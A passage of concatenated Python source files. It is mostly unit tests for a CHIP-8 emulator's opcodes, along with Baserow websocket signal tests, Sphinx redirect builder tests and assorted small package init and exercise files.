assert register == 10, "Register not set to correct value."
elif index == 8:
assert register == 33, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 1, "Carry flag was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_subtract_from_first_register(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 100
self.emulator.registers[8] = 70
self.emulator.opcode_subtract_from_first_register(bytes.fromhex("8485"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 30, "Register not set to correct value."
elif index == 8:
assert register == 70, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 1, "Not borrow flag was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
self.emulator.opcode_subtract_from_first_register(bytes.fromhex("8485"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 216, "Register not set to correct value."
elif index == 8:
assert register == 70, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 0, "Not borrow flag was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_bit_shift_right(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 85
self.emulator.registers[8] = 70
self.emulator.opcode_bit_shift_right(bytes.fromhex("8486"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 42, "Register not set to correct value."
elif index == 8:
assert register == 70, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 1, "Least significant bit was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
self.emulator.opcode_bit_shift_right(bytes.fromhex("8486"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 21, "Register not set to correct value."
elif index == 8:
assert register == 70, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 0, "Least significant bit was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_subtract_from_second_register(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 70
self.emulator.registers[8] = 100
self.emulator.opcode_subtract_from_second_register(bytes.fromhex("8487"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 30, "Register not set to correct value."
elif index == 8:
assert register == 100, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 1, "Not borrow flag was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
self.emulator.registers[8] = 10
self.emulator.opcode_subtract_from_second_register(bytes.fromhex("8487"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 236, "Register not set to correct value."
elif index == 8:
assert register == 10, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 0, "Not borrow flag was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_bit_shift_left(self):
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.registers[4] = 171
self.emulator.registers[8] = 70
self.emulator.opcode_bit_shift_left(bytes.fromhex("848e"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 86, "Register not set to correct value."
elif index == 8:
assert register == 70, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 1, "Most significant bit was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
self.emulator.opcode_bit_shift_left(bytes.fromhex("848e"))
for index, register in enumerate(self.emulator.registers):
if index == 4:
assert register == 172, "Register not set to correct value."
elif index == 8:
assert register == 70, "Second register value was modified when it should not have been."
elif index == 15:
assert register == 0, "Most significant bit was set incorrectly."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_if_register_not_equal(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
self.emulator.registers[10] = int("40", HEX_SIZE)
self.emulator.registers[4] = int("40", HEX_SIZE)
self.emulator.opcode_if_register_not_equal(bytes.fromhex("9a40"))
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter was changed despite register values not matching."
self.emulator.registers[10] = int("11", HEX_SIZE)
self.emulator.registers[4] = int("12", HEX_SIZE)
self.emulator.opcode_if_register_not_equal(bytes.fromhex("9a40"))
assert self.emulator.program_counter == GAME_START_ADDRESS + OPCODE_SIZE, "Next instruction was not skipped when it should have been."
def test_opcode_set_register_i(self):
assert self.emulator.register_i == 0, "Register I starting at an unexpected value."
self.emulator.opcode_set_register_i(bytes.fromhex("a491"))
assert self.emulator.register_i == int("491", HEX_SIZE), "Register I set to the wrong value."
def test_opcode_goto_addition(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
self.emulator.registers[0] = 20
self.emulator.opcode_goto_addition(bytes.fromhex("b5b2"))
assert self.emulator.program_counter == int("5b2", HEX_SIZE) + 20, "Program counter incorrect after jump opcode."
def test_opcode_if_key_pressed(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
assert not self.emulator.keys[6], "Key press starting at an unexpected value."
self.emulator.registers[4] = 6
self.emulator.opcode_if_key_pressed(bytes.fromhex("e49e"))
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter was changed despite key not pressed."
self.emulator.keys[6] = True
self.emulator.opcode_if_key_pressed(bytes.fromhex("e49e"))
assert self.emulator.program_counter == GAME_START_ADDRESS + OPCODE_SIZE, "Next instruction was not skipped when it should have been."
def test_opcode_if_key_not_pressed(self):
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter starting at an unexpected value."
assert not self.emulator.keys[6], "Key press starting at an unexpected value."
self.emulator.registers[4] = 6
self.emulator.keys[6] = True
self.emulator.opcode_if_key_not_pressed(bytes.fromhex("e4a1"))
assert self.emulator.program_counter == GAME_START_ADDRESS, "Program counter was changed despite key pressed."
self.emulator.keys[6] = False
self.emulator.opcode_if_key_not_pressed(bytes.fromhex("e4a1"))
assert self.emulator.program_counter == GAME_START_ADDRESS + OPCODE_SIZE, "Next instruction was not skipped when it should have been."
def test_opcode_get_delay_timer(self):
assert self.emulator.delay == 0, "Delay timer starting at an unexpected value."
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
self.emulator.delay = 55
self.emulator.opcode_get_delay_timer(bytes.fromhex("f307"))
for index, register in enumerate(self.emulator.registers):
if index == 3:
assert register == 55, "Register not set to correct value."
else:
assert register == 0, "Different register than target had its value modified."
def test_opcode_set_delay_timer(self):
assert self.emulator.delay == 0, "Delay timer starting at an unexpected value."
self.emulator.registers[3] = 44
self.emulator.opcode_set_delay_timer(bytes.fromhex("f315"))
assert self.emulator.delay == 44, "Delay timer was not set correctly."
def test_opcode_set_sound_timer(self):
assert self.emulator.sound == 0, "Sound timer starting at an unexpected value."
self.emulator.registers[3] = 44
self.emulator.opcode_set_sound_timer(bytes.fromhex("f318"))
assert self.emulator.sound == 44, "Sound timer was not set correctly."
def test_opcode_register_i_addition(self):
self.emulator.register_i = 4050
self.emulator.registers[7] = 50
self.emulator.opcode_register_i_addition(bytes.fromhex("f71e"))
assert self.emulator.register_i == 4, "Register I set to the wrong value."
assert self.emulator.registers[7] == 50, "Value of register was changed when it was not the target of the addition."
assert self.emulator.registers[15] == 1, "Overflow flag was not set correctly."
self.emulator.opcode_register_i_addition(bytes.fromhex("f71e"))
assert self.emulator.register_i == 54, "Register I set to the wrong value."
assert self.emulator.registers[7] == 50, "Value of register was changed when it was not the target of the addition."
assert self.emulator.registers[15] == 0, "Overflow flag was not set correctly."
def test_opcode_set_register_i_to_hex_sprite_address(self):
assert self.emulator.register_i == 0
self.emulator.load_digit_sprites()
self.emulator.registers[4] = 11
self.emulator.opcode_set_register_i_to_hex_sprite_address(bytes.fromhex("f429"))
assert self.emulator.register_i == 55, "Register I was not set to the correct address for the given sprite."
assert self.emulator.ram[self.emulator.register_i] == int("e0", HEX_SIZE), "The first byte of the B sprite is incorrect."
assert self.emulator.ram[self.emulator.register_i + 1] == int("90", HEX_SIZE), "The second byte of the B sprite is incorrect."
assert self.emulator.ram[self.emulator.register_i + 2] == int("e0", HEX_SIZE), "The third byte of the B sprite is incorrect."
assert self.emulator.ram[self.emulator.register_i + 3] == int("90", HEX_SIZE), "The fourth byte of the B sprite is incorrect."
assert self.emulator.ram[self.emulator.register_i + 4] == int("e0", HEX_SIZE), "The fifth byte of the B sprite is incorrect."
def test_opcode_binary_coded_decimal(self):
for index, byte in enumerate(self.emulator.ram):
if index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Ram starting at an unexpected value."
self.emulator.register_i = 3123
self.emulator.registers[12] = 135
self.emulator.opcode_binary_coded_decimal(bytes.fromhex("fc33"))
assert self.emulator.register_i == 3123, "Register I was modified when it should be left untouched."
for index, byte in enumerate(self.emulator.ram):
if index == 3123:
assert byte == 1, "Hundreds digit set to the incorrect value."
elif index == 3124:
assert byte == 3, "Tens digit set to the incorrect value."
elif index == 3125:
assert byte == 5, "Units digit set to the incorrect value."
elif index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Non-targeted ram address was changed when it shouldn't have been."
self.emulator.registers[12] = 68
self.emulator.opcode_binary_coded_decimal(bytes.fromhex("fc33"))
assert self.emulator.register_i == 3123, "Register I was modified when it should be left untouched."
for index, byte in enumerate(self.emulator.ram):
if index == 3123:
assert byte == 0, "Hundreds digit set to the incorrect value."
elif index == 3124:
assert byte == 6, "Tens digit set to the incorrect value."
elif index == 3125:
assert byte == 8, "Units digit set to the incorrect value."
elif index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Non-targeted ram address was changed when it shouldn't have been."
self.emulator.registers[12] = 5
self.emulator.opcode_binary_coded_decimal(bytes.fromhex("fc33"))
assert self.emulator.register_i == 3123, "Register I was modified when it should be left untouched."
for index, byte in enumerate(self.emulator.ram):
if index == 3123:
assert byte == 0, "Hundreds digit set to the incorrect value."
elif index == 3124:
assert byte == 0, "Tens digit set to the incorrect value."
elif index == 3125:
assert byte == 5, "Units digit set to the incorrect value."
elif index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Non-targeted ram address was changed when it shouldn't have been."
def test_opcode_register_dump(self):
for index, byte in enumerate(self.emulator.ram):
if index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Ram starting at an unexpected value."
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
last_register = 12
self.emulator.register_i = 2000
for register in range(last_register + 1):
self.emulator.registers[register] = (register + 1) * 10
self.emulator.opcode_register_dump(bytes.fromhex("fc55"))
assert self.emulator.register_i == 2000, "Register I was modified when it should be left untouched."
for index, register in enumerate(self.emulator.registers):
if index < last_register + 1:
assert register == (index + 1) * 10, "Register value was modified by dump."
else:
assert register == 0, "Non-targeted register was modified."
for index, byte in enumerate(self.emulator.ram):
if self.emulator.register_i <= index <= self.emulator.register_i + last_register:
assert byte == (index - self.emulator.register_i + 1) * 10, "Register was not dumped correctly."
elif index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Non-targeted memory address was modified."
def test_opcode_register_load(self):
for index, byte in enumerate(self.emulator.ram):
if index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Ram starting at an unexpected value."
for register in self.emulator.registers:
assert register == 0, "Register starting at an unexpected value."
last_register = 12
self.emulator.register_i = 2000
for byte in range(last_register + 1):
self.emulator.ram[self.emulator.register_i + byte] = (byte + 1) * 10
self.emulator.opcode_register_load(bytes.fromhex("fc65"))
assert self.emulator.register_i == 2000, "Register I was modified when it should be left untouched."
for index, register in enumerate(self.emulator.registers):
if index < last_register + 1:
                assert register == (index + 1) * 10, "Register value was not loaded correctly."
else:
assert register == 0, "Non-targeted register was modified."
for index, byte in enumerate(self.emulator.ram):
if self.emulator.register_i <= index <= self.emulator.register_i + last_register:
assert byte == (index - self.emulator.register_i + 1) * 10, "Ram was modified by the load."
elif index >= INTERPRETER_END_ADDRESS:
assert byte == 0, "Non-targeted memory address was modified."
class TestOpcodeRouting:
@classmethod
def setup_class(cls):
cls.emulator = Emulator()
def run_opcode(self, opcode: bytes, bad_opcode: bytes, mock_method: mock.patch.object):
self.emulator.run_opcode(bad_opcode)
mock_method.assert_not_called()
self.emulator.run_opcode(opcode)
mock_method.assert_called_with(opcode)
@mock.patch.object(Emulator, "opcode_call_subroutine")
def test_call_machine_code_routine(self, mock_method):
opcode = bytes.fromhex("0d52")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_clear_screen")
def test_clear_screen(self, mock_method):
opcode = bytes.fromhex("00e0")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_return_from_subroutine")
def test_return_from_subroutine(self, mock_method):
opcode = bytes.fromhex("00ee")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_goto")
def test_goto(self, mock_method):
opcode = bytes.fromhex("132a")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_call_subroutine")
def test_call_subroutine(self, mock_method):
opcode = bytes.fromhex("232a")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_if_equal")
def test_if_equal(self, mock_method):
opcode = bytes.fromhex("332a")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_if_not_equal")
def test_if_not_equal(self, mock_method):
opcode = bytes.fromhex("432a")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_if_register_equal")
def test_if_register_equal(self, mock_method):
opcode = bytes.fromhex("5320")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_register_value")
def test_set_register_value(self, mock_method):
opcode = bytes.fromhex("6133")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_add_value")
def test_add_value(self, mock_method):
opcode = bytes.fromhex("7433")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_register_value_other_register")
def test_set_register_value_other_register(self, mock_method):
opcode = bytes.fromhex("8480")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_register_bitwise_or")
def test_set_register_bitwise_or(self, mock_method):
opcode = bytes.fromhex("8481")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_register_bitwise_and")
def test_set_register_bitwise_and(self, mock_method):
opcode = bytes.fromhex("8482")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_register_bitwise_xor")
def test_set_register_bitwise_xor(self, mock_method):
opcode = bytes.fromhex("8483")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_add_other_register")
def test_add_other_register(self, mock_method):
opcode = bytes.fromhex("8484")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_subtract_from_first_register")
def test_subtract_from_first_register(self, mock_method):
opcode = bytes.fromhex("8485")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_bit_shift_right")
def test_bit_shift_right(self, mock_method):
opcode = bytes.fromhex("8486")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_subtract_from_second_register")
def test_subtract_from_second_register(self, mock_method):
opcode = bytes.fromhex("8487")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_bit_shift_left")
def test_bit_shift_left(self, mock_method):
opcode = bytes.fromhex("848e")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_if_register_not_equal")
def test_if_register_not_equal(self, mock_method):
opcode = bytes.fromhex("9320")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_register_i")
def test_set_register_i(self, mock_method):
opcode = bytes.fromhex("a841")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_goto_addition")
def test_goto_addition(self, mock_method):
opcode = bytes.fromhex("b5b2")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_random_bitwise_and")
def test_random_bitwise_and(self, mock_method):
opcode = bytes.fromhex("c499")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_draw_sprite")
def test_draw_sprite(self, mock_method):
opcode = bytes.fromhex("d458")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_if_key_pressed")
def test_if_key_pressed(self, mock_method):
opcode = bytes.fromhex("e49e")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_if_key_not_pressed")
def test_if_key_not_pressed(self, mock_method):
opcode = bytes.fromhex("e4a1")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_get_delay_timer")
def test_get_delay_timer(self, mock_method):
opcode = bytes.fromhex("f307")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_wait_for_key_press")
def test_wait_for_key_press(self, mock_method):
opcode = bytes.fromhex("f90a")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_delay_timer")
def test_set_delay_timer(self, mock_method):
opcode = bytes.fromhex("f315")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_sound_timer")
def test_set_sound_timer(self, mock_method):
opcode = bytes.fromhex("f318")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_register_i_addition")
def test_register_i_addition(self, mock_method):
opcode = bytes.fromhex("f71e")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_set_register_i_to_hex_sprite_address")
def test_set_register_i_to_hex_sprite_address(self, mock_method):
opcode = bytes.fromhex("f029")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_binary_coded_decimal")
def test_binary_coded_decimal(self, mock_method):
opcode = bytes.fromhex("fc33")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_register_dump")
def test_register_dump(self, mock_method):
opcode = bytes.fromhex("fc55")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
@mock.patch.object(Emulator, "opcode_register_load")
def test_register_load(self, mock_method):
opcode = bytes.fromhex("fc65")
bad_opcode = bytes.fromhex("f000")
self.run_opcode(opcode, bad_opcode, mock_method)
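Every test above follows one pattern: patch a single opcode handler on `Emulator`, dispatch both a matching opcode and a non-matching one (`f000`), and check that the patched handler fired exactly once, for the match only. The sketch below restates that pattern in a self-contained form; the `Emulator.dispatch` body and the module-level `run_opcode` helper are assumptions made for illustration, not the project's real implementation.

```python
from unittest import mock


class Emulator:
    # Hypothetical stand-in for the emulator under test.
    def opcode_set_register_value(self, opcode):
        pass

    def dispatch(self, opcode):
        # CHIP-8 opcodes are keyed by their first nibble: 6XNN sets a register.
        if opcode[0] >> 4 == 0x6:
            self.opcode_set_register_value(opcode)


def run_opcode(opcode, bad_opcode, mock_method):
    # The contract inferred from the tests: the non-matching opcode must not
    # reach the patched handler, and the matching one must hit it exactly once.
    emulator = Emulator()
    emulator.dispatch(bad_opcode)
    emulator.dispatch(opcode)
    mock_method.assert_called_once()


with mock.patch.object(Emulator, "opcode_set_register_value") as m:
    run_opcode(bytes.fromhex("6133"), bytes.fromhex("f000"), m)
    print("6133 dispatched once, f000 ignored")
```

Because `mock.patch.object` swaps the handler at the class level, every instance created inside `run_opcode` sees the mock, which is what lets the tests assert on dispatch without touching emulator state.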

# python/desc/skycatalogs/readers/__init__.py (JoanneBogart/skyCatalogs, BSD-3-Clause)
from .parquet_reader import ParquetReader

# nixml/languages/__init__.py (moredhel/nixml, MIT)
from . import python
from . import texlive
from . import nix

# torchviz/__init__.py (marvosyntactical/pytorchviz, MIT)
from .dot import make_dot, make_dot_from_trace, make_dot_blitz, save_ridge_gauss
from .histogram import HistManager

# hello.py (AryannaD/MB215-Lab1, MIT)
print("Hello world from Aryanna")

# CoinFlip/__init__.py (Xc1d30us-Mercy/CoinFlip, MIT)
from . import Coin

# runner/helper.py (gdv/python-alfabetizzazione, MIT)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
def cls_name(obj):
    doc = obj.__class__.__doc__ + ": " if obj.__class__.__doc__ else ""
    return doc + obj.__class__.__name__
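A quick usage sketch of the `cls_name` helper above: it returns the class name, prefixed by the class docstring when one exists. The helper is restated here so the example runs on its own; the two sample classes are made up for illustration.

```python
def cls_name(obj):
    # Same logic as the helper above: prepend the docstring, if any.
    doc = obj.__class__.__doc__ + ": " if obj.__class__.__doc__ else ""
    return doc + obj.__class__.__name__


class Documented:
    """A koan"""


class Bare:
    pass


print(cls_name(Documented()))  # A koan: Documented
print(cls_name(Bare()))        # Bare
```

A class without its own docstring has `__doc__` set to `None` (it does not inherit `object`'s docstring), which is why the `else ""` branch is needed.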

# backend/tests/baserow/ws/test_ws_signals.py (ericderace/baserow, MIT)
import pytest
from unittest.mock import patch

from baserow.core.handler import CoreHandler


@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_group')
def test_group_created(mock_broadcast_to_group, data_fixture):
    user = data_fixture.create_user()
    group_user = CoreHandler().create_group(user=user, name='Test')
    mock_broadcast_to_group.delay.assert_called_once()
    args = mock_broadcast_to_group.delay.call_args
    assert args[0][0] == group_user.group_id
    assert args[0][1]['type'] == 'group_created'
    assert args[0][1]['group']['id'] == group_user.group_id


@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_group')
def test_group_updated(mock_broadcast_to_group, data_fixture):
    user = data_fixture.create_user()
    user.web_socket_id = 'test'
    group = data_fixture.create_group(user=user)
    group = CoreHandler().update_group(user=user, group=group, name='Test')
    mock_broadcast_to_group.delay.assert_called_once()
    args = mock_broadcast_to_group.delay.call_args
    assert args[0][0] == group.id
    assert args[0][1]['type'] == 'group_updated'
    assert args[0][1]['group_id'] == group.id
    assert args[0][1]['group']['id'] == group.id
    assert args[0][2] == 'test'


@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_users')
def test_group_deleted(mock_broadcast_to_users, data_fixture):
    user = data_fixture.create_user()
    group = data_fixture.create_group(user=user)
    group_id = group.id
    CoreHandler().delete_group(user=user, group=group)
    mock_broadcast_to_users.delay.assert_called_once()
    args = mock_broadcast_to_users.delay.call_args
    assert args[0][0] == [user.id]
    assert args[0][1]['type'] == 'group_deleted'
    assert args[0][1]['group_id'] == group_id


@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_users')
def test_group_user_updated(mock_broadcast_to_users, data_fixture):
    user_1 = data_fixture.create_user()
    user_2 = data_fixture.create_user()
    group = data_fixture.create_group()
    group_user_1 = data_fixture.create_user_group(user=user_1, group=group)
    data_fixture.create_user_group(user=user_2, group=group)
    CoreHandler().update_group_user(user=user_2, group_user=group_user_1,
                                    permissions='MEMBER')
    mock_broadcast_to_users.delay.assert_called_once()
    args = mock_broadcast_to_users.delay.call_args
    assert args[0][0] == [user_1.id]
    assert args[0][1]['type'] == 'group_updated'
    assert args[0][1]['group']['id'] == group.id
    assert args[0][1]['group']['name'] == group.name
    assert args[0][1]['group']['permissions'] == 'MEMBER'
    assert args[0][1]['group_id'] == group.id


@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_users')
def test_group_user_deleted(mock_broadcast_to_users, data_fixture):
    user_1 = data_fixture.create_user()
    user_2 = data_fixture.create_user()
    group = data_fixture.create_group()
    group_user_1 = data_fixture.create_user_group(user=user_1, group=group)
    data_fixture.create_user_group(user=user_2, group=group)
    CoreHandler().delete_group_user(user=user_2, group_user=group_user_1)
    mock_broadcast_to_users.delay.assert_called_once()
    args = mock_broadcast_to_users.delay.call_args
    assert args[0][0] == [user_1.id]
    assert args[0][1]['type'] == 'group_deleted'
    assert args[0][1]['group_id'] == group.id


@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_group')
def test_application_created(mock_broadcast_to_group, data_fixture):
    user = data_fixture.create_user()
    group = data_fixture.create_group(user=user)
    database = CoreHandler().create_application(user=user, group=group,
                                                type_name='database', name='Database')
    mock_broadcast_to_group.delay.assert_called_once()
    args = mock_broadcast_to_group.delay.call_args
    assert args[0][0] == group.id
    assert args[0][1]['type'] == 'application_created'
    assert args[0][1]['application']['id'] == database.id


@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_group')
def test_application_updated(mock_broadcast_to_group, data_fixture):
    user = data_fixture.create_user()
    database = data_fixture.create_database_application(user=user)
    CoreHandler().update_application(user=user, application=database, name='Database')
    mock_broadcast_to_group.delay.assert_called_once()
    args = mock_broadcast_to_group.delay.call_args
    assert args[0][0] == database.group_id
    assert args[0][1]['type'] == 'application_updated'
    assert args[0][1]['application_id'] == database.id
    assert args[0][1]['application']['id'] == database.id


@pytest.mark.django_db(transaction=True)
@patch('baserow.ws.signals.broadcast_to_group')
def test_application_deleted(mock_broadcast_to_group, data_fixture):
    user = data_fixture.create_user()
    database = data_fixture.create_database_application(user=user)
    database_id = database.id
    CoreHandler().delete_application(user=user, application=database)
    mock_broadcast_to_group.delay.assert_called_once()
    args = mock_broadcast_to_group.delay.call_args
    assert args[0][0] == database.group_id
    assert args[0][1]['type'] == 'application_deleted'
    assert args[0][1]['application_id'] == database_id

# buycoins_client/__init__.py (ChukwuEmekaAjah/buycoins_python, MIT)
from .components import orders as Orders
from .components import auth as Auth
from .components import accounts as Accounts
from .components import prices as Prices
from .components import balances as Balances
from .components import transfers as Transfers

# dbpl/__init__.py (gch1p/deadbeef-playlist, BSD-2-Clause)
from .dbpl import Track, Playlist, Flag

# tests/test_write_builder.py (sciencewhiz/sphinxext-rediraffe, MIT)
import pytest
from sphinx.testing.path import path


@pytest.fixture(scope="module")
def rootdir():
    return path(__file__).parent.abspath() / "roots" / "builder"


@pytest.mark.sphinx("rediraffewritediff", testroot="renamed_write_file_not_redirected")
def test_builder_renamed_file_write_not_redirected(app_init_repo):
    app_init_repo.build()
    valid_string = '"another.rst" "another2.rst"'
    with open(path(app_init_repo.srcdir).joinpath("redirects.txt"), "r") as file:
        assert valid_string in file.readline()


@pytest.mark.sphinx("rediraffewritediff", testroot="renamed_write_file_perc_low_fail")
def test_builder_renamed_file_write_perc_low_fail(app_init_repo):
    app_init_repo.build()
    valid_string = '"another.rst" "another2.rst"'
    with open(path(app_init_repo.srcdir).joinpath("redirects.txt"), "r") as file:
        assert valid_string not in file.readline()


@pytest.mark.sphinx("rediraffewritediff", testroot="renamed_write_file_perc_low_pass")
def test_builder_renamed_file_write_perc_low_pass(app_init_repo):
    app_init_repo.build()
    valid_string = '"another.rst" "another2.rst"'
    with open(path(app_init_repo.srcdir).joinpath("redirects.txt"), "r") as file:
        assert valid_string in file.readline()

# 13/test/src/__init__.py (leisurexi/python-study, Apache-2.0)
# author: leisurexi
# date: 2021-01-16 22:16

# truetool/command_line.py (truecharts/truetool, BSD-3-Clause)
import truetool


def main():
    truetool.run()

# wordsalad/utils/__init__.py (skurmedel/wordsalad, MIT)
from .text import *

# esercizi/while.py (gdv/python-alfabetizzazione, MIT)
y = 0.0
x = 0.0
print("y = ", y, "\tx = ", x, "<- inizializzazione")
while y <= 10:
    y = 0.5 * x + 2
    print("y = ", y, "\tx = ", x)
    x = x + 1.65
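The exercise above keeps recomputing y = 0.5 * x + 2 from an x that grows by 1.65 each pass, so the loop stops on the first pass where the freshly computed y exceeds 10, i.e. once x has passed 16. A small trace, with the prints replaced by an iteration counter, confirms the termination reasoning:

```python
# Count how many times the loop body from esercizi/while.py runs before
# y = 0.5 * x + 2 climbs past 10 (x steps through 0, 1.65, 3.3, ...).
y = 0.0
x = 0.0
iterations = 0
while y <= 10:
    y = 0.5 * x + 2
    x = x + 1.65
    iterations += 1
print(iterations)  # 11
```

The eleventh pass uses x = 16.5, giving y = 10.25, which is the first value above the threshold, so the loop exits after 11 iterations.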

# electrolysis/__init__.py (tjlane/electrolysis, MIT)
# init
import inout

# brewpi/recipes/views/__init__.py (trottmpq/brewpi, MIT)
# -*- coding: utf-8 -*-
"""The api view module."""
from .blueprint import blueprint  # noqa

# test/__init__.py (ceos-seo/django-datacube-wcs, Apache-2.0)
from .test_wcs_spec import TestWCSSpecification

# example/controllers/__init__.py (codejamninja/cfoundation, MIT)
from .base import Base

# apps/usuario/admin.py (WilliamColmenares/Access_control, MIT)
from django.contrib import admin

from apps.usuario.models import PasswordCliente, HuellaDigital

admin.site.register(PasswordCliente)
